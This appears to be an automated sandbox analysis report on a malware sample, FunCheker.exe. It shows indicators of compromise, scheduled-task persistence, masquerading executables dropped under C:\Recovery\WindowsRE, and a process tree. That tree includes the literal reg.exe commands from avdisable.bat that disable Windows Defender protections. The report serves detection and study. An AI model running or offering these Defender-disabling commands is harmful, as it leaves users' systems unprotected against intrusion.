\REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings comcommon.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings SppExtComObj.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings Micrasoft.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings Micrasoft.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings SppExtComObj.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings comcommon.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings Micrasoft.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings WmiPrvSE.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings SppExtComObj.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings SppExtComObj.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings WmiPrvSE.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings WmiPrvSE.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings WmiPrvSE.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings SppExtComObj.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings SppExtComObj.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings SppExtComObj.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings SppExtComObj.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings comcommon.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings SppExtComObj.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings Micrasoft.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings SppExtComObj.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings SppExtComObj.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings WmiPrvSE.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings SppExtComObj.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings SppExtComObj.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings WmiPrvSE.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 64 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 4780 schtasks.exe 3916 schtasks.exe 2456 schtasks.exe 5296 schtasks.exe 1984 schtasks.exe 1396 schtasks.exe 1276 schtasks.exe 232 schtasks.exe 4388 schtasks.exe 5164 schtasks.exe 5940 schtasks.exe 1928 schtasks.exe 5788 schtasks.exe 1292 schtasks.exe 5088 schtasks.exe 5984 schtasks.exe 5116 schtasks.exe 860 schtasks.exe 2148 schtasks.exe 1572 schtasks.exe 5204 schtasks.exe 5316 schtasks.exe 628 schtasks.exe 392 schtasks.exe 3984 schtasks.exe 4296 schtasks.exe 4140 schtasks.exe 4344 schtasks.exe 4576 schtasks.exe 1232 schtasks.exe 3548 schtasks.exe 2976 schtasks.exe 3660 schtasks.exe 5084 schtasks.exe 4944 schtasks.exe 5856 schtasks.exe 3980 schtasks.exe 5028 schtasks.exe 5916 schtasks.exe 5584 schtasks.exe 1516 schtasks.exe 6104 schtasks.exe 5852 schtasks.exe 2172 schtasks.exe 1356 schtasks.exe 5192 schtasks.exe 5312 schtasks.exe 5532 schtasks.exe 5516 schtasks.exe 4364 schtasks.exe 2820 schtasks.exe 1692 schtasks.exe 5024 schtasks.exe 4244 schtasks.exe 2312 schtasks.exe 2136 schtasks.exe 5048 schtasks.exe 4016 schtasks.exe 5720 schtasks.exe 2284 schtasks.exe 4160 schtasks.exe 4900 schtasks.exe 5684 schtasks.exe 5372 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
comcommon.exeSppExtComObj.exeSppExtComObj.exeSppExtComObj.exeSppExtComObj.exeSppExtComObj.exeSppExtComObj.exeSppExtComObj.exemsedge.exemsedge.exeSppExtComObj.exeidentity_helper.exeSppExtComObj.exeSppExtComObj.exemsedge.exeSppExtComObj.exeSppExtComObj.exeSppExtComObj.exeSppExtComObj.exeSppExtComObj.exeSppExtComObj.exeSppExtComObj.exeSppExtComObj.execomcommon.exemsedge.execomcommon.exeWmiPrvSE.exeWmiPrvSE.exeWmiPrvSE.exeWmiPrvSE.exepid process 4244 comcommon.exe 4380 SppExtComObj.exe 2236 SppExtComObj.exe 728 SppExtComObj.exe 1492 SppExtComObj.exe 1492 SppExtComObj.exe 1652 SppExtComObj.exe 1228 SppExtComObj.exe 1380 SppExtComObj.exe 396 msedge.exe 396 msedge.exe 512 msedge.exe 512 msedge.exe 1444 SppExtComObj.exe 1444 SppExtComObj.exe 3088 identity_helper.exe 3088 identity_helper.exe 1324 SppExtComObj.exe 1324 SppExtComObj.exe 4656 SppExtComObj.exe 4656 SppExtComObj.exe 3156 msedge.exe 3156 msedge.exe 5004 SppExtComObj.exe 5004 SppExtComObj.exe 5972 SppExtComObj.exe 5972 SppExtComObj.exe 1044 SppExtComObj.exe 1044 SppExtComObj.exe 5528 SppExtComObj.exe 5528 SppExtComObj.exe 6092 SppExtComObj.exe 6092 SppExtComObj.exe 5328 SppExtComObj.exe 5328 SppExtComObj.exe 5408 SppExtComObj.exe 5408 SppExtComObj.exe 1684 SppExtComObj.exe 1684 SppExtComObj.exe 6108 comcommon.exe 6108 comcommon.exe 6108 comcommon.exe 6108 comcommon.exe 6108 comcommon.exe 3804 msedge.exe 3804 msedge.exe 3804 msedge.exe 3804 msedge.exe 932 comcommon.exe 932 comcommon.exe 932 comcommon.exe 932 comcommon.exe 932 comcommon.exe 932 comcommon.exe 932 comcommon.exe 932 comcommon.exe 6140 WmiPrvSE.exe 6140 WmiPrvSE.exe 1952 WmiPrvSE.exe 1952 WmiPrvSE.exe 2076 WmiPrvSE.exe 2076 WmiPrvSE.exe 2068 WmiPrvSE.exe 2068 WmiPrvSE.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 14 IoCs
Processes:
msedge.exepid process 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe -
Suspicious use of AdjustPrivilegeToken 31 IoCs
Processes:
comcommon.exeSppExtComObj.exeSppExtComObj.exeSppExtComObj.exeSppExtComObj.exeSppExtComObj.exeSppExtComObj.exeSppExtComObj.exeSppExtComObj.exeSppExtComObj.exeSppExtComObj.exeSppExtComObj.exeSppExtComObj.exeSppExtComObj.exeSppExtComObj.exeSppExtComObj.exeSppExtComObj.exeSppExtComObj.exeSppExtComObj.execomcommon.exeSppExtComObj.exemsedge.execomcommon.execomcommon.exeWmiPrvSE.exeWmiPrvSE.exeWmiPrvSE.exeWmiPrvSE.exeWmiPrvSE.exeWmiPrvSE.exeWmiPrvSE.exedescription pid process Token: SeDebugPrivilege 4244 comcommon.exe Token: SeDebugPrivilege 4380 SppExtComObj.exe Token: SeDebugPrivilege 2236 SppExtComObj.exe Token: SeDebugPrivilege 728 SppExtComObj.exe Token: SeDebugPrivilege 1492 SppExtComObj.exe Token: SeDebugPrivilege 1652 SppExtComObj.exe Token: SeDebugPrivilege 1228 SppExtComObj.exe Token: SeDebugPrivilege 1380 SppExtComObj.exe Token: SeDebugPrivilege 1444 SppExtComObj.exe Token: SeDebugPrivilege 1324 SppExtComObj.exe Token: SeDebugPrivilege 4656 SppExtComObj.exe Token: SeDebugPrivilege 5004 SppExtComObj.exe Token: SeDebugPrivilege 5972 SppExtComObj.exe Token: SeDebugPrivilege 1044 SppExtComObj.exe Token: SeDebugPrivilege 5528 SppExtComObj.exe Token: SeDebugPrivilege 6092 SppExtComObj.exe Token: SeDebugPrivilege 5328 SppExtComObj.exe Token: SeDebugPrivilege 5408 SppExtComObj.exe Token: SeDebugPrivilege 1684 SppExtComObj.exe Token: SeDebugPrivilege 6108 comcommon.exe Token: SeDebugPrivilege 764 SppExtComObj.exe Token: SeDebugPrivilege 5252 msedge.exe Token: SeDebugPrivilege 4160 comcommon.exe Token: SeDebugPrivilege 932 comcommon.exe Token: SeDebugPrivilege 6140 WmiPrvSE.exe Token: SeDebugPrivilege 1952 WmiPrvSE.exe Token: SeDebugPrivilege 2076 WmiPrvSE.exe Token: SeDebugPrivilege 2068 WmiPrvSE.exe Token: SeDebugPrivilege 3608 WmiPrvSE.exe Token: SeDebugPrivilege 5888 WmiPrvSE.exe Token: SeDebugPrivilege 5720 WmiPrvSE.exe -
Suspicious use of FindShellTrayWindow 28 IoCs
Processes:
msedge.exepid process 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe -
Suspicious use of SendNotifyMessage 26 IoCs
Processes:
msedge.exepid process 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe 512 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
FunCheker.execmd.execmd.exeMicrasoft.exedescription pid process target process PID 1356 wrote to memory of 5116 1356 FunCheker.exe Micrasoft.exe PID 1356 wrote to memory of 5116 1356 FunCheker.exe Micrasoft.exe PID 1356 wrote to memory of 5116 1356 FunCheker.exe Micrasoft.exe PID 1356 wrote to memory of 4032 1356 FunCheker.exe cmd.exe PID 1356 wrote to memory of 4032 1356 FunCheker.exe cmd.exe PID 1356 wrote to memory of 4608 1356 FunCheker.exe cmd.exe PID 1356 wrote to memory of 4608 1356 FunCheker.exe cmd.exe PID 1356 wrote to memory of 872 1356 FunCheker.exe cmd.exe PID 1356 wrote to memory of 872 1356 FunCheker.exe cmd.exe PID 4608 wrote to memory of 1948 4608 cmd.exe chcp.com PID 4608 wrote to memory of 1948 4608 cmd.exe chcp.com PID 872 wrote to memory of 704 872 cmd.exe reg.exe PID 872 wrote to memory of 704 872 cmd.exe reg.exe PID 872 wrote to memory of 4408 872 cmd.exe reg.exe PID 872 wrote to memory of 4408 872 cmd.exe reg.exe PID 5116 wrote to memory of 396 5116 Micrasoft.exe WScript.exe PID 5116 wrote to memory of 396 5116 Micrasoft.exe WScript.exe PID 5116 wrote to memory of 396 5116 Micrasoft.exe WScript.exe PID 872 wrote to memory of 1172 872 cmd.exe reg.exe PID 872 wrote to memory of 1172 872 cmd.exe reg.exe PID 872 wrote to memory of 1104 872 cmd.exe reg.exe PID 872 wrote to memory of 1104 872 cmd.exe reg.exe PID 872 wrote to memory of 1508 872 cmd.exe reg.exe PID 872 wrote to memory of 1508 872 cmd.exe reg.exe PID 872 wrote to memory of 3920 872 cmd.exe reg.exe PID 872 wrote to memory of 3920 872 cmd.exe reg.exe PID 872 wrote to memory of 4984 872 cmd.exe reg.exe PID 872 wrote to memory of 4984 872 cmd.exe reg.exe PID 872 wrote to memory of 1276 872 cmd.exe reg.exe PID 872 wrote to memory of 1276 872 cmd.exe reg.exe PID 872 wrote to memory of 5072 872 cmd.exe reg.exe PID 872 wrote to memory of 5072 872 cmd.exe reg.exe PID 872 wrote to memory of 1652 872 cmd.exe reg.exe PID 872 wrote to memory of 1652 872 cmd.exe reg.exe PID 872 wrote to memory of 5108 872 cmd.exe reg.exe PID 872 wrote to memory of 5108 872 cmd.exe reg.exe PID 872 wrote to memory of 2284 872 cmd.exe reg.exe PID 872 wrote to memory of 2284 872 cmd.exe reg.exe PID 872 wrote to memory of 2280 872 cmd.exe reg.exe PID 872 wrote to memory of 2280 872 cmd.exe reg.exe PID 872 wrote to memory of 2952 872 cmd.exe reg.exe PID 872 wrote to memory of 2952 872 cmd.exe reg.exe PID 872 wrote to memory of 1100 872 cmd.exe reg.exe PID 872 wrote to memory of 1100 872 cmd.exe reg.exe PID 872 wrote to memory of 3936 872 cmd.exe schtasks.exe PID 872 wrote to memory of 3936 872 cmd.exe schtasks.exe PID 872 wrote to memory of 1624 872 cmd.exe schtasks.exe PID 872 wrote to memory of 1624 872 cmd.exe schtasks.exe PID 872 wrote to memory of 4960 872 cmd.exe schtasks.exe PID 872 wrote to memory of 4960 872 cmd.exe schtasks.exe PID 872 wrote to memory of 3784 872 cmd.exe schtasks.exe PID 872 wrote to memory of 3784 872 cmd.exe schtasks.exe PID 872 wrote to memory of 2072 872 cmd.exe schtasks.exe PID 872 wrote to memory of 2072 872 cmd.exe schtasks.exe PID 872 wrote to memory of 1324 872 cmd.exe reg.exe PID 872 wrote to memory of 1324 872 cmd.exe reg.exe PID 872 wrote to memory of 1060 872 cmd.exe reg.exe PID 872 wrote to memory of 1060 872 cmd.exe reg.exe PID 872 wrote to memory of 1376 872 cmd.exe reg.exe PID 872 wrote to memory of 1376 872 cmd.exe reg.exe PID 872 wrote to memory of 776 872 cmd.exe reg.exe PID 872 wrote to memory of 776 872 cmd.exe reg.exe PID 872 wrote to memory of 4636 872 cmd.exe reg.exe PID 872 wrote to memory of 4636 872 cmd.exe reg.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\FunCheker.exe"C:\Users\Admin\AppData\Local\Temp\FunCheker.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1356 -
C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe"C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:5116 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\kXeJA.vbe"3⤵
- Checks computer location settings
PID:396 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\ZqKnM.bat" "4⤵PID:4808
-
C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe"C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4244 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\eTV455KIx4.bat"6⤵PID:4504
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:27⤵PID:676
-
-
C:\Recovery\WindowsRE\SppExtComObj.exe"C:\Recovery\WindowsRE\SppExtComObj.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4380 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Zlmto9DLwM.bat"8⤵PID:1800
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:29⤵PID:3884
-
-
C:\Recovery\WindowsRE\SppExtComObj.exe"C:\Recovery\WindowsRE\SppExtComObj.exe"9⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2236 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\NfeiSKMyn5.bat"10⤵PID:3988
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:211⤵PID:3088
-
-
C:\Recovery\WindowsRE\SppExtComObj.exe"C:\Recovery\WindowsRE\SppExtComObj.exe"11⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:728 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Pbgl9PPr7s.bat"12⤵PID:60
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:213⤵PID:3656
-
-
C:\Recovery\WindowsRE\SppExtComObj.exe"C:\Recovery\WindowsRE\SppExtComObj.exe"13⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1492 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\nfin2KLgOh.bat"14⤵PID:4364
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:215⤵PID:1544
-
-
C:\Recovery\WindowsRE\SppExtComObj.exe"C:\Recovery\WindowsRE\SppExtComObj.exe"15⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1652 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\QwDZd8tkMK.bat"16⤵PID:4652
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:217⤵PID:4312
-
-
C:\Recovery\WindowsRE\SppExtComObj.exe"C:\Recovery\WindowsRE\SppExtComObj.exe"17⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1228 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\CL2HVdYORd.bat"18⤵PID:2844
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:219⤵PID:2912
-
-
C:\Recovery\WindowsRE\SppExtComObj.exe"C:\Recovery\WindowsRE\SppExtComObj.exe"19⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1380 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Mw1PlbJmoj.bat"20⤵PID:4936
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:221⤵PID:3208
-
-
C:\Recovery\WindowsRE\SppExtComObj.exe"C:\Recovery\WindowsRE\SppExtComObj.exe"21⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1444 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\gZmmY05In2.bat"22⤵PID:1376
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:223⤵PID:4140
-
-
C:\Recovery\WindowsRE\SppExtComObj.exe"C:\Recovery\WindowsRE\SppExtComObj.exe"23⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1324 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\nAABNdhKLs.bat"24⤵PID:1660
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:225⤵PID:1844
-
-
C:\Recovery\WindowsRE\SppExtComObj.exe"C:\Recovery\WindowsRE\SppExtComObj.exe"25⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4656 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\vF7CrwxjwX.bat"26⤵PID:3824
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:227⤵PID:1472
-
-
C:\Recovery\WindowsRE\SppExtComObj.exe"C:\Recovery\WindowsRE\SppExtComObj.exe"27⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5004 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\mQXsfud8LV.bat"28⤵PID:5176
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:229⤵PID:5280
-
-
C:\Recovery\WindowsRE\SppExtComObj.exe"C:\Recovery\WindowsRE\SppExtComObj.exe"29⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5972 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\bhowVEGEG8.bat"30⤵PID:5192
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:231⤵PID:5256
-
-
C:\Recovery\WindowsRE\SppExtComObj.exe"C:\Recovery\WindowsRE\SppExtComObj.exe"31⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1044 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\LZh5ueQJla.bat"32⤵PID:3548
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:233⤵PID:4220
-
-
C:\Recovery\WindowsRE\SppExtComObj.exe"C:\Recovery\WindowsRE\SppExtComObj.exe"33⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5528 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\eR3ydISl4k.bat"34⤵PID:5848
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:235⤵PID:5864
-
-
C:\Recovery\WindowsRE\SppExtComObj.exe"C:\Recovery\WindowsRE\SppExtComObj.exe"35⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6092 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\iqKdioc4MG.bat"36⤵PID:3408
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:237⤵PID:2644
-
-
C:\Recovery\WindowsRE\SppExtComObj.exe"C:\Recovery\WindowsRE\SppExtComObj.exe"37⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5328 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\8RIE4o2SCx.bat"38⤵PID:3736
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:239⤵PID:5360
-
-
C:\Recovery\WindowsRE\SppExtComObj.exe"C:\Recovery\WindowsRE\SppExtComObj.exe"39⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5408 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\45aGjaybPu.bat"40⤵PID:5836
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:241⤵PID:5776
-
-
C:\Recovery\WindowsRE\SppExtComObj.exe"C:\Recovery\WindowsRE\SppExtComObj.exe"41⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1684 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\HcCr6nEVp7.bat"42⤵PID:1944
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:243⤵PID:4920
-
-
C:\Recovery\WindowsRE\SppExtComObj.exe"C:\Recovery\WindowsRE\SppExtComObj.exe"43⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:764
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\clear_av.bat" "2⤵PID:4032
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FunChecker .bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:4608 -
C:\Windows\system32\chcp.comchcp 650013⤵PID:1948
-
-
C:\Windows\system32\timeout.exetimeout /t 6 /nobreak3⤵
- Delays execution with timeout.exe
PID:2872
-
-
C:\Windows\system32\timeout.exetimeout /t 6 /nobreak3⤵
- Delays execution with timeout.exe
PID:5044
-
-
C:\Windows\system32\timeout.exetimeout /t 6 /nobreak3⤵
- Delays execution with timeout.exe
PID:1944
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\avdisable.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:872 -
C:\Windows\system32\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f3⤵PID:704
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f3⤵PID:4408
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f3⤵PID:1172
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f3⤵PID:1104
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1508
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:3920
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:4984
-
-
